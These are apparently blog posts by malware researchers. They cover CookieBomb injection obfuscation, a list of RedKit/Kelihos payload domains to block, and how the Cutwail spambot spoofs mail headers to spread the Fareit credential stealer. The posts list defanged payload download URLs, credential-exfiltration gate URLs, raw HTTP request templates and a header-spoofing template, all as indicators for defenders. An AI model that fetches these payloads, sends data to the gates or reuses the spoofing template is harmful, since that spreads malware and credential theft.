We posted the attack related to this injection code in many web pages as per posted here: -->>[previous post], I called this as #CookieBomb attack, it uses the obfuscation JavaScript to burp the hidden redirection via IFRAME and the cookie condition to be used as a ticket for malware infection further maliciousre direction. This post is an additional note of a recent updates of injection code used, as a notice for the adjustment that needed to make for the automation tools on detection related infected sites (if necessary).

Recently I saw a slight modifications for the injected script for infection they use, which I tried to documented in here as per following points.

1. Method of PHP script wrapping

With a simple trick which using PHP script's "echo" command to obfuscate the JavaScript codes wrapped within.

I saw a new infected site with this code like this one, just now, well is is a good gardening shop site, a victim website:

If you see in the infected/hacked site it shows the code" " in the upper left corner of the page, thus in the HTML code you can see the malicious code injected to it. The injected code is having the same pattern of usage of a long long white spaces as a silly attempt o hide it.

The problem is, if you scan as per it is through "known" tools the scanning can not be performed as per it is, i.e.: you'll get the result like this-->>[LINK-1] or this-->>[LINK-2]
which is not showing any malicious detection (except the long white space trails maybe..) Yes this code "currently" can not be scanned in the JavaScript auto decoding tools, and that's what the bad guys wanted it.

So let's take a look closer at the code:

The bad actors is using the JavaScript wrapped in the php command, in this case the echo command, which for the symbol it needs to use the escape character of backslash "\" for the quote sign. This is why the automation can not decode this well, because actually it is in a form of PHP script.

So what are we suppose to overcome this? All we have to do is to remove those characters (I marked those character in the green color) above and you can decode it at will in any JavaScript decoding tools to get the result of the #CookieBomb code as per below:

This scheme will be changed for sure, but don't worry nor afraid of it, because no matter what these bad actors made we shall crack it well. I am sorry for the "light" technicalities I wrote this time, but the impact of this matter is huge and infection is wide, I assume the awareness is necessary. With noted, not only #CookieBomb case, the similar trick can be performed to avoid automation and detection to other malicious obfuscation too.

Samples

I share my decoding note in case you don't want to make risk accessing the infected site I mentioned above in here-->>[SAMPLE].
The password is as usual.

2. Method of mixing hex number

I found the infected sites as per below snapshot:

In the above picture it looks like the usual #CookieBomb obfuscated code, which is not.
My fellow co-workers complaining me that they can not decode this using the automation, which I checked into the Wepawet amd Jsunpack to confirm it as per shown in below:

If you see the code closer you will see the code contains the new trick of obfuscation using the character stated in its hex values as per snipped below:

As you see there are hex of "0x62" and "0xa-02" used in the obfuscation code.

In the first part, you change the hex into its ASCII character and in the second part if you calculate the hex calculation, you can substitute the result directly to the code into:

And you can decode these without problem by your favourite decoder tools, which mine is the "ape" one :-)
The decoded result:

3. Method of string splitting & mixing hex code operation with integer

There is an infected sites which injected by #CookieBomb code as per below:

The code is as per below code and can not be processed in automation tools, the question is why?

If we see it carefully in below marked parts there was a modification:

As per previously explained it used the mixed hex character to replace the real value, but it added string splitting of the hex characters as per seen in line 5. And also noted in the line 32, the condition combined with the hex and integer (0x19==031) and also the subtraction operation of hex with integer stored variable "bv".

Just change the value as per noted with the green color and you can decode into any tools you prefer. PS for spider monkey or rhino simulator this code will run without problem and storing the result instantly.

Below is the decoding result:

4. Method of hiding the "split", a trap & changing hex places

Got another wave of infection coming one of them has this changing, is just like the malware moronz and I are playing a kind of CTF now, OK let's see who will win in the end.. The infected page is up for the research/check purpose:

The code is as per below "format" and the modification spotted I marked as per below in colour. I checked my team's work on these and the common mistakes this time went into the un-necessary changes for the var which is not a hex, here we go:

Well of course after the codes are adjusted you can decode it in anyway you want as per below:
I have a feeling this "note" of changing will be a loong list :-) So be it!

#MalwareMustDie!

Read More

#Alert - Kelihos payload download zone in .RU 93 domains still ALIVE - RedKit EK #malware distribution!

We detected massive infection of RedKit in Japan as per posted by our Japanese team here -->>[0day.jp]
The Red Kit attack was targeting innocent popular sites like site of happiness relation of mother and child and the office document navigation as per snapshot below (we detected 54 sites of 214 urls are infected): And after cracking the exploit code we found these are the payload used:

and

We always urge the our team to post the infection url into URLquery for the sorting 6 PoC purpose, so does this case, the total URL grepped in two days ago are:

// grep rasta*
 
0 / 3 [7]hxxp://131.155.81.158/rasta01.exe Netherlands 131.155.81.158
0 / 6 [8]hxxp://fuhxodyz.ru/rasta01.exe Belarus 93.125.67.95
0 / 0 [9]hxxp://www.philchor-nb.de/demo/rasta01.exe Germany
0 / 2 [10]hxxp://ikqydkod.ru/rasta01.exe Ukraine 109.251.141.23
0 / 2 [11]hxxp://aro0eq.hozfezbe.ru/rasta01.exe Russian Federation
0 / 6 [12]hxxp://bopefidi.ru/rasta01.exe Russian Federation 2.94.27.238
0 / 2 [13]hxxp://ycsycxyd.ru/rasta01.exe Ukraine 46.119.193.89
0 / 2 [14]hxxp://sojouvyc.ru/rasta01.exe Ukraine 31.128.74.7
0 / 2 [15]hxxp://vadlubiq.ru/rasta01.exe Ukraine 109.162.84.6
0 / 2 [16]hxxp://kazlyjva.ru/rasta01.exe Malaysia 58.26.182.98
0 / 2 [17]hxxp://funfubap.ru/rasta01.exe Taiwan 114.35.239.185
0 / 2 [18]hxxp://goryzcob.ru/rasta01.exe Ukraine 109.87.254.247
0 / 2 [19]hxxp://motbajsi.ru/rasta01.exe Ukraine 91.196.61.56
0 / 6 [20]hxxp://xymkapaq.ru/rasta01.exe Latvia 89.201.53.86
0 / 2 [21]hxxp://hupjiwuc.ru/rasta01.exe Ukraine 195.114.156.254
0 / 6 [22]hxxp://runevfoh.ru/rasta01.exe Ukraine 5.248.34.57
0 / 2 [23]hxxp://virerceb.ru/rasta01.exe Argentina 190.227.181.203
0 / 6 [24]hxxp://xatzyjha.ru/rasta01.exe Taiwan 1.172.233.239
0 / 2 [25]hxxp://makgivus.ru/rasta01.exe Canada 99.250.218.131
0 / 2 [26]hxxp://avryjpet.ru/rasta01.exe Belarus 91.215.178.83
0 / 2 [27]hxxp://kyjaqcoz.ru/rasta01.exe Ukraine 213.231.52.44
0 / 2 [28]hxxp://bopefidi.ru/rasta01.exe Taiwan 111.255.72.1
0 / 6 [29]hxxp://ycsycxyd.ru/rasta01.exe Japan 118.104.77.165
0 / 2 [30]hxxp://gazgowry.ru/rasta01.exe Ukraine 77.122.55.112
0 / 2 [31]hxxp://vetarwep.ru/rasta01.exe Kazakhstan 176.222.169.243
0 / 6 [32]hxxp://aro0eq.hozfezbe.ru/rasta01.exe Bulgaria 95.43.87.30
0 / 6 [33]hxxp://gulaxxax.ru/rasta01.exe Ukraine 31.42.69.61
0 / 6 [34]hxxp://onhugxic.ru/rasta01.exe Kazakhstan 109.239.45.48
0 / 2 [35]hxxp://ahfamzyk.ru/rasta01.exe Ukraine 178.150.33.194
0 / 6 [36]hxxp://sykevked.ru/rasta01.exe Ukraine 151.0.44.52
0 / 6 [37]hxxp://ydhicdor.ru/rasta01.exe Ukraine 78.30.249.126
0 / 1 [38]hxxp://qeisybyg.ru/rasta01.exe Ukraine 109.87.7.53
0 / 2 [39]hxxp://ycsycxyd.ru/rasta01.exe Ukraine 188.231.173.99
0 / 6 [40]hxxp://kifectah.ru/rasta01.exe Japan 61.27.109.166
0 / 2 [41]hxxp://busasxyv.ru/rasta01.exe Belarus 37.215.87.61
0 / 6 [42]hxxp://yjnaqwew.ru/rasta01.exe Ukraine 93.77.96.252
0 / 6 [43]hxxp://xuktalez.ru/rasta01.exe Ukraine 176.106.211.135
0 / 2 [44]hxxp://ybtoptag.ru/rasta01.exe Latvia 89.191.110.59
0 / 2 [45]hxxp://lygyucce.ru/rasta01.exe Ukraine 94.178.78.102
0 / 6 [46]hxxp://taykenid.ru/rasta01.exe Ukraine 212.92.227.111
0 / 2 [47]hxxp://qeisybyg.ru/rasta01.exe Ukraine 109.251.2.33
0 / 6 [48]hxxp://taykenid.ru/rasta01.exe Ukraine 176.8.183.90
0 / 2 [49]hxxp://qeisybyg.ru/rasta01.exe Ukraine 77.87.156.180
0 / 2 [50]hxxp://bysjyhuf.ru/rasta01.exe Taiwan 1.173.164.63
0 / 6 [51]hxxp://najniner.ru/rasta01.exe Taiwan 114.40.130.52
0 / 4 [52]hxxp://193.105.134.189/rasta01.exe Sweden 193.105.134.189
0 / 6 [53]hxxp://dakacdyn.ru/rasta01.exe Ukraine 178.158.82.158
0 / 6 [54]hxxp://higrikpy.ru/rasta01.exe Belgium 85.26.38.155
0 / 2 [55]hxxp://dipteqna.ru/rasta01.exe Ukraine 109.87.32.180
0 / 6 [56]hxxp://kykywpik.ru/rasta01.exe Ukraine 5.1.13.86
0 / 2 [57]hxxp://cimmitic.ru/rasta01.exe Japan 118.237.85.238
0 / 2 [58]hxxp://ybtoptag.ru/rasta01.exe Belarus 91.215.178.235
0 / 6 [59]hxxp://suyzerew.ru/rasta01.exe Kazakhstan 178.91.37.180
0 / 6 [60]hxxp://ycsycxyd.ru/rasta01.exe Ukraine 93.77.68.69
0 / 2 [61]hxxp://ynhazcel.ru/rasta01.exe Kazakhstan 2.133.226.218
0 / 6 [62]hxxp://aflyzkac.ru/rasta01.exe Ukraine 93.77.28.43
0 / 2 [63]hxxp://giktyxvu.ru/rasta01.exe Ukraine 188.190.42.32
0 / 4 [64]hxxp://193.105.134.89/rasta01.exe Sweden 193.105.134.89
0 / 2 [65]hxxp://aro0eq.hozfezbe.ru/rasta01.exe Ukraine 31.133.38.207
0 / 2 [66]hxxp://aflyzkac.ru/rasta01.exe Japan 210.148.165.67
0 / 6 [67]hxxp://giktyxvu.ru/rasta01.exe Ukraine 178.159.231.99
0 / 6 [68]hxxp://ybtoptag.ru/rasta01.exe Ukraine 89.252.33.161
0 / 6 [69]hxxp://dyvgigim.ru/rasta01.exe Ukraine 37.229.35.234
0 / 4 [70]hxxp://193.105.134.89/rasta01.exe Sweden 193.105.134.89
0 / 6 [71]hxxp://jehrecyp.ru/rasta01.exe Ukraine 188.230.9.64
0 / 2 [72]hxxp://aro0eq.hozfezbe.ru/rasta01.exe[/code] Ukraine
0 / 6 [73]hxxp://cyrkapov.ru/rasta01.exe Ukraine 176.8.183.90
0 / 6 [74]hxxp://niqtasoz.ru/rasta01.exe Ukraine 46.172.147.122
0 / 2 [75]hxxp://ginkyvub.ru/rasta01.exe Ukraine 93.77.84.22
0 / 2 [76]hxxp://tejjetzo.ru/rasta01.exe Moldova, Republic of
0 / 6 [77]hxxp://fafehwiz.ru/rasta01.exe Ukraine 178.150.115.215
0 / 2 [78]hxxp://yhzelbyp.ru/rasta01.exe Ukraine 37.57.24.238
0 / 2 [79]hxxp://ihurvyun.ru/rasta01.exe Ukraine 178.158.198.249
0 / 6 [80]hxxp://adtyuhuz.ru/rasta01.exe Russian Federation 128.73.7.18
0 / 2 [81]hxxp://aro0eq.hozfezbe.ru/rasta01.exe Hong Kong 118.141.33.46
0 / 6 [82]hxxp://jehrecyp.ru/rasta01.exe Ukraine 91.200.138.241
0 / 7 [83]hxxp://tejjetzo.ru/rasta01.exe Ukraine 94.153.63.166
0 / 3 [84]hxxp://fafehwiz.ru/rasta01.exe Ukraine 81.163.152.32
0 / 3 [85]hxxp://yhzelbyp.ru/rasta01.exe Chile 186.36.204.152
0 / 7 [86]hxxp://adtyuhuz.ru/rasta01.exe Argentina 190.107.122.36
0 / 7 [87]hxxp://aggaxsef.ru/rasta01.exe Taiwan 1.173.221.95
0 / 3 [88]hxxp://bomuxvis.ru/rasta01.exe Taiwan 1.172.231.167
0 / 7 [89]hxxp://jehrecyp.ru/rasta01.exe Ukraine 178.150.57.167
0 / 7 [90]hxxp://xejabfom.ru/rasta01.exe Belarus 176.118.159.88
0 / 3 [91]hxxp://sapigrys.ru/rasta01.exe Ukraine 93.77.97.98
0 / 3 [92]hxxp://sodkanxo.ru/rasta01.exe Ukraine 77.122.55.156
0 / 7 [93]hxxp://aggaxsef.ru/rasta01.exe Ukraine 178.150.169.180
0 / 3 [94]hxxp://fafehwiz.ru/rasta01.exe Ukraine 89.162.163.66
0 / 3 [95]hxxp://zyvjofat.ru/rasta01.exe Taiwan 36.239.213.101
0 / 2 [96]hxxp://paxgeqjo.ru/rasta01.exe Israel 46.121.221.173
0 / 6 [97]hxxp://zyvjofat.ru/rasta01.exe Ukraine 46.211.95.246
0 / 2 [98]hxxp://hiznizoc.ru/rasta01.exe Korea, Republic of
0 / 2 [99]hxxp://lysopzoh.ru/rasta01.exe Ukraine 46.118.218.45
0 / 2 [100]hxxp://zyvjofat.ru/rasta01.exe Ukraine 178.150.192.214
0 / 2 [101]hxxp://xoqhozaz.ru/rasta01.exe Ukraine 109.162.96.64
0 / 2 [102]hxxp://hiznizoc.ru/rasta01.exe Ukraine 176.112.20.187
0 / 6 [103]hxxp://lysopzoh.ru/rasta01.exe Ukraine 93.175.234.62
0 / 6 [104]hxxp://zyvjofat.ru/rasta01.exe Ukraine 46.211.227.0
0 / 6 [105]hxxp://pywudcoz.ru/rasta01.exe Japan 180.14.61.59
0 / 6 [106]hxxp://izytexuf.ru/rasta01.exe Taiwan 123.194.247.85
0 / 6 [107]hxxp://izytexuf.ru/rasta01.exe Kazakhstan 2.132.145.189
0 / 6 [108]hxxp://usfezhyk.ru/rasta01.exe Ukraine 176.98.15.73
0 / 6 [109]hxxp://hipahsah.ru/rasta01.exe Belarus 134.17.112.99
0 / 6 [110]hxxp://talozzum.ru/rasta01.exe Ukraine 93.78.126.109
0 / 6 [111]hxxp://yrupxyen.ru/rasta01.exe Ukraine 5.105.21.178
0 / 6 [112]hxxp://nacwoman.ru/rasta01.exe Ukraine 109.251.74.37
0 / 2 [113]hxxp://libcikak.ru/rasta01.exe Japan 219.102.110.98
0 / 6 [114]hxxp://uphinjaq.ru/rasta01.exe Ukraine 151.0.5.20
0 / 6 [115]hxxp://aziwolge.ru/rasta01.exe Ukraine 151.0.38.74
0 / 6 [116]hxxp://kosnutef.ru/rasta01.exe Ukraine 93.79.38.73
0 / 6 [117]hxxp://kiyvryhy.ru/rasta01.exe Ukraine 80.77.44.150
0 / 2 [118]hxxp://oktizsez.ru/rasta01.exe Ukraine 91.227.207.89
0 / 6 [119]hxxp://uphinjaq.ru/rasta01.exe Ukraine 31.170.137.75
0 / 6 [120]hxxp://xaplovav.ru/rasta01.exe Ukraine 93.79.113.101
0 / 6 [121]hxxp://aziwolge.ru/rasta01.exe Ukraine 93.79.2.115
0 / 6 [122]hxxp://uphinjaq.ru/rasta01.exe Taiwan 114.25.156.106
0 / 6 [123]hxxp://xaplovav.ru/rasta01.exe Japan 123.225.106.205
0 / 6 [124]hxxp://oktizsez.ru/rasta01.exe Taiwan 111.252.191.134
0 / 6 [125]hxxp://kiyvryhy.ru/rasta01.exe Taiwan 124.11.195.73
0 / 2 [126]hxxp://sisvizub.ru/rasta01.exe Belarus 178.124.179.118
0 / 2 [127]hxxp://lymimnib.ru/rasta01.exe Ukraine 37.229.38.92
0 / 6 [128]hxxp://fugegwyf.ru/rasta01.exe Ukraine 159.224.94.242
0 / 2 [129]hxxp://fugegwyf.ru/rasta01.exe Russian Federation
0 / 2 [130]hxxp://urxibzep.ru/rasta01.exe Latvia 79.135.142.166
0 / 6 [131]hxxp://cibowjuv.ru/rasta01.exe Japan 219.173.80.25
0 / 6 [132]hxxp://pedtokid.ru/rasta01.exe Ukraine 188.231.173.99
0 / 2 [133]hxxp://bawoxgud.ru/rasta01.exe Ukraine 188.231.173.99
 
// grep userid*
 
0 / 3 [7]hxxp://131.155.81.158/userid2.exe Netherlands 131.155.81.158
0 / 6 [8]hxxp://fuhxodyz.ru/userid2.exe Ukraine 89.252.33.161
0 / 2 [9]hxxp://ikqydkod.ru/userid2.exe Ukraine 178.137.38.18
0 / 1 [10]hxxp://ikqydkod.ru/ruserid2.exe Ukraine 176.8.183.137
0 / 6 [11]hxxp://xudsahbu.ru/userid2.exe Colombia 186.99.248.89
0 / 6 [12]hxxp://dypqysro.ru/userid2.exe Ukraine 212.79.121.221
0 / 6 [13]hxxp://uhipyvob.ru/userid2.exe Ukraine 46.119.193.89
0 / 2 [14]hxxp://jyuhysdo.ru/userid2.exe Ukraine 46.119.129.244
0 / 6 [15]hxxp://runevfoh.ru/userid2.exe Ukraine 46.211.249.42
0 / 6 [16]hxxp://hupjiwuc.ru/userid2.exe Ukraine 78.30.193.176
0 / 7 [17]hxxp://busasxyv.ru/userid2.exe Russian Federation 2.94.27.238
0 / 6 [18]hxxp://cypseguv.ru/userid2.exe Taiwan 124.12.91.243
0 / 3 [19]hxxp://78.83.177.242/userid2.exe Bulgaria 78.83.177.242
0 / 7 [20]hxxp://runevfoh.ru/userid2.exe Japan 123.176.141.183
0 / 6 [21]hxxp://confikja.ru/userid2.exe Ukraine 212.2.153.131
0 / 6 [22]hxxp://runevfoh.ru/userid2.exe Belarus 93.191.99.97
0 / 6 [23]hxxp://confikja.ru/userid2.exe Belarus 37.215.114.92
0 / 2 [24]hxxp://confikja.ru/userid2.exe Ukraine 109.87.181.75
0 / 6 [25]hxxp://tofhermi.ru/userid2.exe Ukraine 109.87.83.108
0 / 1 [26]hxxp://fafehwiz.ru/userid1.exe Ukraine 178.151.63.5
0 / 6 [27]hxxp://ybtoptag.ru/userid2.exe Ukraine 94.153.63.166
0 / 2 [28]hxxp://qeisybyg.ru/userid2.exe Russian Federation
0 / 2 [29]hxxp://mihumcuf.ru/userid2.exe Ukraine 77.122.68.176
0 / 1 [30]hxxp://fafehwiz.ru/userid1.exe Ukraine 94.154.33.114
0 / 1 [31]hxxp://ollopdub.ru/userid1.exe Taiwan 114.27.25.145
0 / 1 [32]hxxp://fafehwiz.ru/userid1.exe Ukraine 159.224.8.181
0 / 1 [33]hxxp://ollopdub.ru/userid1.exe Ukraine 92.52.177.41
0 / 1 [34]hxxp://fafehwiz.ru/userid1.exe Ukraine 94.45.106.206
0 / 1 [35]hxxp://ollopdub.ru/userid1.exe Ukraine 109.162.41.226
0 / 1 [36]hxxp://fafehwiz.ru/userid1.exe India 49.206.161.32
0 / 1 [37]hxxp://pywudcoz.ru/userid1.exe Ukraine 93.78.79.28
0 / 1 [38]hxxp://ollopdub.ru/userid1.exe Hong Kong 223.19.195.162
0 / 1 [39]hxxp://ollopdub.ru/userid1.exe Ukraine 46.185.34.216
0 / 1 [40]hxxp://pywudcoz.ru/userid1.exe Russian Federation
0 / 1 [41]hxxp://hiznizoc.ru/userid1.exe Ukraine 87.244.169.104
0 / 1 [42]hxxp://ollopdub.ru/userid1.exe Macedonia 146.255.91.19
0 / 1 [43]hxxp://hiznizoc.ru/userid1.exe Ukraine 176.36.152.60
0 / 1 [44]hxxp://ollopdub.ru/userid1.exe Ukraine 37.143.93.132
0 / 1 [45]hxxp://kosnutef.ru/userid1.exe Ukraine 176.111.35.196
0 / 6 [46]hxxp://acaqizwy.ru/userid1.exe Taiwan 61.227.163.213
0 / 2 [47]hxxp://lymimnib.ru/userid1.exe Ukraine 176.103.208.105
0 / 2 [48]hxxp://sisvizub.ru/userid1.exe Ukraine 178.150.212.143
0 / 3 [49]hxxp://78.83.177.242/userid1.exe Bulgaria 78.83.177.242
0 / 3 [50]hxxp://78.83.177.242/userid1.exe Bulgaria 78.83.177.242
0 / 3 [51]hxxp://78.83.177.242/userid1.exe Bulgaria 78.83.177.242
0 / 2 [52]hxxp://ankoweco.ru/userid1.exe Poland 79.135.180.94
0 / 2 [53]hxxp://uxmadjox.ru/userid1.exe Poland 86.63.98.141

Of course we issued the request for immediate shutdown for these payload domains, which is 97 in total (so far.. maybe more.. please inform us if you find more). But it looks like until this moment this post is written only four domains got shutdown and 93 of them are still up and alive as per below list of DGA .RU domains and IP used:

uhipyvob.ru,178.150.17.118,
ollopdub.ru,176.8.3.144,
fafehwiz.ru,91.217.58.74,
fuhxodyz.ru,77.122.197.86,
ikqydkod.ru,37.229.144.253,
bopefidi.ru,118.34.132.154,
ycsycxyd.ru,95.140.214.250,
sojouvyc.ru,188.129.218.87,
vadlubiq.ru,178.93.135.94,
kazlyjva.ru,109.162.94.114,
funfubap.ru,213.37.166.193,
goryzcob.ru,213.37.166.193,
motbajsi.ru,178.158.158.182,
xymkapaq.ru,93.185.219.213,
runevfoh.ru,89.215.115.4,
virerceb.ru,94.153.36.164,
xatzyjha.ru,93.79.152.211,
makgivus.ru,79.135.211.87,
avryjpet.ru,178.211.105.168,
kyjaqcoz.ru,46.119.144.106,
hiznizoc.ru,46.250.7.179,
giktyxvu.ru,77.123.79.211,
ynhazcel.ru,178.172.246.30,
gazgowry.ru,93.89.208.202,
vetarwep.ru,5.248.164.41,
gulaxxax.ru,46.119.144.106,
onhugxic.ru,109.251.126.26,
ahfamzyk.ru,46.49.47.254,
sykevked.ru,93.77.96.252,
ydhicdor.ru,94.137.172.44,
kifectah.ru,109.122.40.111,
busasxyv.ru,77.121.199.73,
yjnaqwew.ru,77.121.255.183,
xuktalez.ru,91.123.150.115,
lygyucce.ru,94.158.74.230,
taykenid.ru,109.108.252.136,
bysjyhuf.ru,5.1.22.63,
najniner.ru,126.65.174.136,
dakacdyn.ru,109.254.67.25,
higrikpy.ru,78.154.168.74,
dipteqna.ru,188.190.75.232,
kykywpik.ru,109.122.33.79,
cimmitic.ru,153.180.71.144,
suyzerew.ru,217.196.171.35,
yhzelbyp.ru,77.123.80.174,
aflyzkac.ru,93.185.220.213,
tejjetzo.ru,93.89.208.202,
lysopzoh.ru,178.168.22.114,
dyvgigim.ru,46.211.75.123,
jehrecyp.ru,87.69.55.36,
cyrkapov.ru,190.220.70.79,
niqtasoz.ru,178.150.17.118,
ginkyvub.ru,77.123.80.174,
zyvjofat.ru,93.79.152.211,
ihurvyun.ru,94.231.190.74,
izytexuf.ru,31.192.237.101,
adtyuhuz.ru,84.252.56.59,
aggaxsef.ru,94.230.201.36,
bomuxvis.ru,84.240.19.130,
xejabfom.ru,178.158.186.24,
sapigrys.ru,95.69.187.249,
sodkanxo.ru,117.197.245.69,
paxgeqjo.ru,49.205.210.193,
xoqhozaz.ru,95.160.83.57,
usfezhyk.ru,46.119.212.183,
hipahsah.ru,109.87.200.213,
talozzum.ru,31.133.52.8,
yrupxyen.ru,91.224.168.65,
nacwoman.ru,178.150.90.223,
libcikak.ru,46.119.128.115,
uphinjaq.ru,109.162.9.212,
aziwolge.ru,178.150.17.118,
oktizsez.ru,78.139.153.169,
kiyvryhy.ru,79.133.254.238,
fugegwyf.ru,188.190.75.232,
urxibzep.ru,91.225.173.12,
bawoxgud.ru,31.133.55.240,
xudsahbu.ru,195.24.155.245,
dypqysro.ru,31.170.137.75,
jyuhysdo.ru,78.154.168.74,
hupjiwuc.ru,188.121.198.247,
cypseguv.ru,176.8.249.131,
confikja.ru,93.171.77.37,
tofhermi.ru,36.224.71.20,
ybtoptag.ru,180.61.12.116,
qeisybyg.ru,77.122.124.210,
mihumcuf.ru,93.185.220.213,
pywudcoz.ru,89.201.116.227,
kosnutef.ru,79.164.250.218,
acaqizwy.ru,178.150.244.54,
lymimnib.ru,117.197.15.103,
sisvizub.ru,89.28.52.30,
hozfezbe.ru,178.210.222.205,

Since the weekend is coming and I bet the infecion is still in the wild, we urge everyone to block these .RU listed, for a precaution if we can not shut these mess down in time.

Your cooperation is highly appreciated, with thank you in advance!

#MalwareMustDie!

Read More

How bad the Cutwail and other SpamBot can fool (spoof) us?

As per title says, the answer is VERY bad and nasty. I took my bitter pill by analyzing this case, it is important for sharing this information since there are very lack of these in the internet, so I dare myself to write this analysis experience.

Yesterday we came into a spam malvertisement of login credential stealer (Trojan Win32/Fareit) which looks like sent from an infected PC in a local network of US's Department of Defense, and also looks relayed via their email sever. Below is the snapshot of the email:

And this is the written header for relaying this malvertisement:

You can see is a common spam of malware campaign, inside of the ZIP file there is an executable PE file which actually a Trojan Win32/Fareit, an FTP, FileZilla, Browser, Remote Directory, Email and Faceook's login credential stealer.

The distributed Trojan: Win32/Fareit

Well to be brief, the trojan itself runs as per the below video and downloading two Zeus variant malware files from remote host, send the grabbed our login data to a remote credential panel (we call it gates) URL, and in the end to make our PC becoming a part of Zeus botnet.

Below is some evidence I grabbed, the panel sent with credentials:

h00p://nursenextdoor.com:443/ponyb/gate.php
h00p://dreamonseniorswish.org:443/ponyb/gate.php
h00p://prospexleads.com:8080/ponyb/gate.php
h00p://phonebillssuck.com:8080/ponyb/gate.php

The POST method use to send the credential:

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)
POST %s HTTP/1.0
Host: %s
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: %lu
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: %s
Content-Length:
Location:

The encoded posted traffic contains credentials:

The downloaded another files malware (ZeuS/Zbot) URL:

h00p://www.lavetrinadeidesideri.it/Twe.exe
h00p://ftp.aquasarnami.com/zKo.exe

And the HTTP method it used to download them:

GET %s HTTP/1.0
Host: %s
Accept-Language: en-US
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: %s

PoC of the downloaded Zeus:

And with be saved in here by the Win32/Fareit:

↑These are Zeus malware alright. Confused a bit with the spambot and FakeAV but thank's to Xylit0l & other friend who remind me to recheck.

The overall samples and its detection ration in VT (click the MD5) is here:

---

2013/07/17 18:44 158,720 c7e5b822101343c1a4d8a2297a1a7d40 CommBank_Docs_18072013.exe 
2013/07/18 19:18 205,824 1427015ba8d9736e6329ea0444bb300c Twe.exe                    
2013/07/18 20:01 315,392 0ac084b9fa597c74ea1260ed054b126e zKo.exe                    

---

Wrote a deeper analysis of the malware attached and can be viewed here-->>[KernelMode]

How far can they spoof?

Excluding the rogue contents used in the email. It is a common practice of these scammer to spoof: (1) Sender's email address, (2) Email's message ID, (3) The mail client information or even (4) The fake MIME version used in the header (these are marked red color numbers in the below picture).

With noted: They can fake "almost" everything even like the character set used (see the blue color part), see the following explanation for this details.

If we see the email routing header used in this spam, seems like the email was relayed two times before it came to my honeypot address. Let's see the routing information clearly which I marked in the above picture in purple color highlight. The first relay (which is the lower part) looks like a client in a local network with the IP mask 192.168.8.0/24 sent this email to a reached network's MTA, in this case is: 143.214.203.103 to relay this spam to another remote MTA in 69.199.182.82 then it was relayed to my honeypot mail server to my address.

So what happen after a an unix admin or engineer after seeing this? Oh, it looks like some malware infected a client in 143.214.203.103, which after checking further is the IP 143.214.203.103 is at the US DoD's network:

OK, this was a shock and a fact that hard to believe myself, so I tweeted this as per below:

Pls tell me "why?" US DOD's IP address can be used to relay email #malware? https://t.co/czcRPoIxYt #MalwareMustDie! pic.twitter.com/UY7x1faMva

— MalwareMustDie, NPO (@MalwareMustDie) July 18, 2013

And got no response to deny this, UNTIL...

A fellow researcher (thank's to @snixerxero) contacted me for the possibility of spoofing for those email routing header. After looked back to the header again and the way it's written, I replied "No way, looks real to me, you must be wrong!", and he came with the related template of the Cutwail (Reference of Cutwail is here -->>[LINK])spambot as a PoC (with many thanks) as per I pasted below:

Received: from [{NUMBER[1-2]}{NUMBER[0-5]}{NUMBER[0-5]}.{NUMBER[1-2]}{NUMBER[0-5]}
{NUMBER[0-5]}.{NUMBER[1-2]}{NUMBER[0-5]}{NUMBER[0-5]}.{NUMBER[1-2]}{NUMBER[0-5]}
{NUMBER[0-5]}] (port={NUMBER[1-9]}{DIGIT[1]}{DIGIT[1]}{DIGIT[1]}{DIGIT[1]} 
helo=[192.168.{DIGIT[1]}.{DIGIT[1]}{DIGIT[1]}]) by {BOT_IP} with asmtp id 
1rqLaL-000{SYMBOL[1]}{SYMBOL[1]}-00 for {MAILTO_USERNAME}@{MAILTO_DOMAIN}; {DATE}

Surprisingly THIS template match well to the values of the DoD header routing's data below:

Received: from [143.214.203.103] (port=30877 helo=[192.168.8.11]) by 69.199.182.82 with
  asmtp id 1rqLaL-0002D-00 for xxx@xxx; Wed, 17 Jul 2013 15:26:40 -0500

This information is also breaking the ice of the template code as per below details:

---

1. The IP addresss spoofed template:

{NUMBER[1-2]}{NUMBER[0-5]}{NUMBER[0-5]}.{NUMBER[1-2]}{NUMBER[0-5]}{NUMBER[0-5]}.{NUMBER[1-2]}{NUMBER[0-5]}{NUMBER[0-5]}.{NUMBER[1-2]}{NUMBER[0-5]}{NUMBER[0-5]}

please see the REGEX-like values used.

2. The port number template(format):

{NUMBER[1-9]}{DIGIT[1]}{DIGIT[1]}{DIGIT[1]}{DIGIT[1]

as per IP template, noted the digit per digit used to plot this number, a good hint in reversing.

3. We came into most important part, the way this spambot fakes the email relay log ID with the below template:

by {BOT_IP} with asmtp id 1rqLaL-000{SYMBOL[1]}{SYMBOL[1]}-00 for 

This will print the fake relay log ID below:

by 69.199.182.82 with
  asmtp id 1rqLaL-0002D-00 for xxx@xxx; Wed, 17 Jul 2013 15:26:40 -0500

Which explains us that 69.199.182.82 is the ACTUAL SpamBot IP of the Cutwail and there are never bee any relay of these malvertisement in 143.214.203.103 at all.

---

Mitigation

By understanding the template used by the spambots, we can do many things for blocking these spambot's malvertisement in the SMTP layer. Sadly, like happen to this case, mostly are in the crypted or encoded XML and can not be seen right away. we should pay more research attention and spread to all filtration industry the discovered spam template. for another example of ANOTHER spambot template.

Recently, we had a case where we popped and exposed one of the template while we nailed a Kuluoz network in this case here -->>[PASTEBIN].

In that case we decrypted (yes.. that one was not encoded but encrypted, so we did not decoding it) the spambot template and showing the below spoof email header as per below:

↑In this case we see the spoofing of the Outlook Express email client (MUA) used. Please noted the fake character set used.

Back to our original case, in the template at the relay log ID parts, we can see the below "static" strings used:

with asmtp id 1rqLaL-000

and we know this is the unique string of template that I received (which was explained as Cutwail spambot's) template, so let's see "how many" and "what kind of spam" they altready sent us by using this template. I just grep that static strings into my spam database (is a mailbox collection I made of those botnet sent garbage to my honeypot) as per picture below:

These are the snapshots of recent ones (click to enlarge the picture) :

See the one with my name printed in the zip file?
One of the spambot template is implemented in he attachment filename, to be precise, like this one:

The above additional three samples are attached with Fareit, Fareit and Fareit.

So we know each other now (smile), and we know also WHO's crime group moronz is using WHAT and spreading WHICH malware mess now. We're getting closer to nail these scums for good. To these moronz, go and send me more of your spams! :-)

Sample

We share this information to common people and security researcher for raising the understanding & detection ratio in the SMTP methodology filtration for these threat.

